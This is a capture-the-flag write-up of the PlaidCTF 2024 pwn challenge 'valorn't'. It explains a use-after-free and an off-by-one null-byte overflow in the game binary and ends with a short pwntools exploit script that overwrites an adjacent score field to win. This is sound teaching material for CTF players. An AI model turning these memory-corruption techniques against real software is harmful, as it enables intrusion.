valorn't - PlaidCTF 2024

Posted on Apr 23, 2024

I solved the easy pwn chall “valorn’t” during PlaidCTF while playing with Friendly Maltese Citizens.

as usual, the goal was to win the game and read the flag

    int ret = play_pew_pew_game();

	if (ret == 0) {

in order to win, is_cheater had to be set and the enemy team win-counter has to be 0

int play_pew_pew_game() {
	// ...
	if (is_cheater) {
		if (res->enemy_team == 0) {
			return 0;
		else {
			puts("Dang, you're dogwater. Go back to the range");
			return 1;
	else {
		puts("Not good enough. Should be able to take out cheaters as well\n");
	return 1;

first of all about the is_cheater variable: in play_rounds you can set the cheater_detected variable corresponding to each round_node_t to 1 when entering a bad word in the post-round message. however this is instantly undone in the if-branch after. this would normally result in cheater_checker(), which checks the cheater_detected property for each round, to return false, so we’d loose. in our case, that isn’t a problem though, since the if-branch introduces a use-after-free for round_node_t:

if (rounds[curr_round]->cheater_detected == 1) {
	// ...
	rounds[curr_round]->cheater_detected = 0;
	printf("Would you like to report this to the devs? ");
	// ...
	scanf(" %c", &choice);
	// ...
	if (choice == 'y') {
		char *msg = malloc(0x70);
		get_message(msg, 0x70);
		// ...

as you can see rounds[curr_round] isn’t zeroed out and still used in cheater_checker(). we also immedeatly get to overwrite the round_node_t struct affected by the uaf, which let’s us set the cheater_detected successfully again. this is how we set is_cheater in play_pew_pew_game().

to get the flag, the next constraint is res->enemy_team == 0. however you automatically loose every second round, so you can’t prevent the enemy win-counter to be set:

if (curr_round % 2 == 0) {
	score->our_team += 1;
	printf("Congrats on the round win!!\n");
} else {
	score->enemy_team += 1;
	printf("Aww, you lost. You'll get em next time\n");

luckily there is also a vulnerabilitiy to let us bybass the check. after the game we’re asked about some feedback. our input is read into the msg property of the game_t structure. now the next vuln lies in filter_message(). if we place a bad word at the end of msg, plus our last weapon choice being 3, we have a null byte overflow:

if (gun_choice == 3 && strstr(msg, "heck") != NULL) {
	printf("Swear detected! Filtering out\n");
	int idx = strstr(msg, "heck") - msg;
	int after_len = strlen(msg) + 1 - idx;
	char *before = malloc(idx + 1);
	char *after = malloc(after_len);
	strncpy(after, msg+idx+4, after_len);
	strncpy(msg + idx, "*****", 5);
	strncpy(msg+idx+5, after, after_len);
	msg[idx+5+after_len] = '\0';

	return 2;	

this tries to remove the bad word and replace it with asterisks, however also appends a null byte at the end, which goes out-of-bounds by 1 byte. we’re lucky that game_t has the following structure:

typedef struct game_t {
	char msg[0x64];
	int enemy_team;
	int our_team;
	int last_used_weapon;
} game;

this means our off-by-one null byte overflow can zero out the enemy team and help us pass the check. in combination with the uaf we can successfully win the game and get the flag. the exploit is pretty simple:

from pwn import *

#p = process("./valor-not")
p = remote("",1337)

for i in range(7):
    p.sendlineafter("Choose your weapon:","3")

p.sendline("A"*0x5f + "heck")
